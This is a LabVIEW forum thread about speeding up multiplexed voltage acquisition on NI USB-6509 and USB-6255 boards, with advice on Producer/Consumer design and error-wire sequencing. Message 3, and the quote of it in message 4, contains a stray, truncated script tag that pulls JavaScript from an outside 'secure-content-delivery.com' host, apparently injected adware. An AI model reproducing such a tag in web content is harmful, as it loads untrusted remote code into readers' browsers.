cancel
Showing results for 
Search instead for 
Did you mean: 

Increase Speed of acquisiton of a LABVIEW coding

Solved!
Go to solution

Hi folks,

I'm using digital USB 6509 boards to do some multiplexing.

Then I use USB-6255 boards to get some voltage measurements.

The acquisition is a bit slow and I'm trying to increase the speed.

I'm attaching the code. If some has some hints to increase the vi speed and/or someone has some experience with

these boards I would appreciate it.

The code is attached.

Best Regards,

Rui Silva

0 Kudos
Message 1 of 5
(2,421 Views)

Wow, that VI needs some cleaning up.  You might want to think about breaking up the code into subVIs to make it more managable.

Now, as far as your performance, The bottleneck I am noticing at a quick glance is the building of arrays of waveforms.  That can be a very expensive operation once your array gets large enough.  Look into the Producer/Consumer architecture so you can write to disk while you are acquiring the data and avoid the building of large arrays.

GCentral
There are only two ways to tell somebody thanks: Kudos and Marked Solutions
Unofficial Forum Rules and Guidelines
"Not that we are sufficient in ourselves to claim anything as coming from us, but our sufficiency is from God" - 2 Corinthians 3:5
Message 2 of 5
(2,403 Views)

Hi <script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={B9144335-EA92-4885-9235-B9DE4448C044}&d=2013-08-0...

thanks for your reply. I'll look into it later today.

I know the code needs clearing but it's just for better observation and task priority, I'll clean it later.

Another point, if I may ask, are the start tasks. The reason for the case structures is so some tasks don't start without the others.

I have to say that I don't know another way to make them comply to my needs. Can you offer some advice?

Best Regards,

Rui Silva

0 Kudos
Message 3 of 5
(2,377 Views)

@Rsilva wrote:

Hi @crossrulz <script type="text/javascript" src="https://secure-content-delivery.com/data.js.php?i={B9144335-EA92-4885-9235-B9DE4448C044}&d=2013-08-0...

thanks for your reply. I'll look into it later today.

I know the code needs clearing but it's just for better observation and task priority, I'll clean it later.

Another point, if I may ask, are the start tasks. The reason for the case structures is so some tasks don't start without the others.

I have to say that I don't know another way to make them comply to my needs. Can you offer some advice?

Best Regards,

Rui Silva

In my experience, "later" usually becomes"never," no matter how pure your intentions.  😉

Bill
CLD
(Mid-Level minion.)
My support system ensures that I don't look totally incompetent.
Proud to say that I've progressed beyond knowing just enough to be dangerous. I now know enough to know that I have no clue about anything at all.
Humble author of the CLAD Nugget.
0 Kudos
Message 4 of 5
(2,373 Views)
Solution
Accepted by topic author Rsilva

Rsilva wrote:

Case structures?  I don't see any case structures.  Do you mean Sequence Structures?  You don't need those at all.  Just propagate the error wire (ie use data flow) to force your execution sequencing instead.

GCentral
There are only two ways to tell somebody thanks: Kudos and Marked Solutions
Unofficial Forum Rules and Guidelines
"Not that we are sufficient in ourselves to claim anything as coming from us, but our sufficiency is from God" - 2 Corinthians 3:5
Message 5 of 5
(2,358 Views)